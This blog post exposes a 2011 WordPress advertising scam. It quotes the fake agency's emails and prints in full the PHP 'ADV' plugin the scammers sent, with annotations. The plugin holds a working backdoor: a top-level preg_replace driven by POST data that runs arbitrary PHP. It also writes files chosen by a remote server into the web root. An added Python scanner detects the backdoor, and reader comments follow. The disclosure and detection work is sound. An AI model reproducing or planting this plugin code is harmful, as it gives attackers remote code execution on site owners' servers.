There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.
1. The first contact is through a comment on your site. This is the comment; the details may vary somewhat:
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00
2. Once you email the person, this is the reply:
> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00
3. After some questioning on my part, I received this email:
Hi! Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that lets advertiser check your site and decide if it fits his requirements.
Best regards,
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00
4. Finally, I get this email, complete with a password:
Hi!
Thanks for reply to our proposal!
We like your price.
To pass to the banner control system follow the link http://webmaster.izidaagency.com
To enter use the following data:
login: my other site
password: email me for password
You should install and activate the plugin in order to display advertisement.
Before making payment, advertiser must approve location of the banner.
The banner will be shown on your site when you add special code to your web address
(for example: http://www.my other site.com/?adv_test=1).
It means, that visitors will see the banner only if it is approved and payment made.
To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install
To activate your site you have to enter the code: GQP-HFA-55H
What way of payment is suitable for you?
Best regards,
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00
5. OK, now I have the code. What do I do with it? The file that I downloaded is a PHP script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:
_____________________________________________________________________________________________
<?php
/*
Plugin Name: ADV
Description: ADV Plugin
Version: 2.6.1
*/

class AdvWidget extends WP_Widget {
    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget') advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) { }
}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));
add_action('admin_menu', 'advPluginMenu');
register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

// Fetches a URL from the "agency" server; used for activation and banner downloads.
function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');
function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir)) mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size)) mkdir($advBannerDir . "/" . $size);
                // Writes whatever the remote server returns into the web root, under
                // directory and file names chosen by that server (not limited to images).
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message"><p>Banners are downloaded successfully.</p></div>';
    }
}

// The backdoor. This statement sits at file top level, so it runs on every
// request that loads the plugin, logged in or not. Both the regex pattern and
// the replacement come straight from POST data; with the /e modifier (PHP < 7)
// in the pattern, preg_replace evaluates the replacement as PHP code, i.e.
// remote code execution for whoever knows the parameter names.
if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }
    $advPlace = get_option('adv_place');
    echo '<div>';
    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';
}
?>
_____________________________________________________________________________
This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:
http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860
My comments are at the bottom of that page.
I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.
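The line to watch in the script above is the top-level preg_replace whose pattern and replacement are taken straight from $_POST: on the PHP 5 versions of the time the pattern may end in the /e modifier, which makes preg_replace evaluate the replacement as PHP, so any unauthenticated request to the site can run code. Added here as a detection aid (not part of the original post or of the plugin): a Python scanner that flags that construct in PHP source, parsing the first argument nesting-aware because the plugin buries $_POST inside str_replace(...), and also reports the plugin's own string indicators; the two PHP snippets are constructed samples.

```python
import re

# Indicator strings taken from the ADV plugin quoted above.
ADV_INDICATORS = ("izidaagency.com", "adv_banners", "ADV_SERVICE_URL", "adv_key")
CALL_RE = re.compile(r"preg_replace\s*\(")
REQUEST_VAR_RE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")

def first_argument(src, start):
    """First argument of the call whose '(' is at src[start]; nesting- and quote-aware."""
    depth, quote, i = 0, None, start
    while i < len(src):
        c = src[i]
        if quote:
            if c == "\\":
                i += 1  # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return src[start + 1:i]
        elif c == "," and depth == 1:
            return src[start + 1:i]
        i += 1
    return src[start + 1:]

def scan_source(src):
    """Return (severity, message) findings for one PHP source text."""
    findings = []
    for m in CALL_RE.finditer(src):
        # A request-controlled pattern can carry /e, which on PHP < 7 makes preg_replace eval() the replacement.
        if REQUEST_VAR_RE.search(first_argument(src, m.end() - 1)):
            line = src.count("\n", 0, m.start()) + 1
            findings.append(("critical", f"line {line}: preg_replace pattern built from request data"))
    hits = [i for i in ADV_INDICATORS if i in src]
    if hits:
        findings.append(("high", "ADV plugin indicators: " + ", ".join(hits)))
    return findings

# Constructed samples: the plugin's backdoor line, and a benign call that uses request data only as the subject.
SAMPLE_BACKDOOR = r'''<?php
define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
$r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');
'''
SAMPLE_BENIGN = r'''<?php
$slug = preg_replace('/[^a-z0-9-]/', '', strtolower($_POST['title']));
'''
```

Run scan_source() over every .php file under wp-content/plugins; a "critical" finding is the eval-style backdoor and the plugin should be removed, not just deactivated, since the line fires whenever the file is loaded.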
I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.
Thanks for reading!
I also had this comment sent to my site. Thanks for the heads-up.
I had the same scam targeted on me too. Here’s my account on it (http://www.atpeaz.com/index.php/2011/wordpress-blogs-targeted-scam-beware-of-the-adv-zip-plugin/). All too familiar except for the agency’s name!
Thanks Ken. I’m glad that you worked out the php file. Your guess about it being an attempt to access the payment account is probably correct. This has been going on since 2007. I wonder how many accounts have been compromised?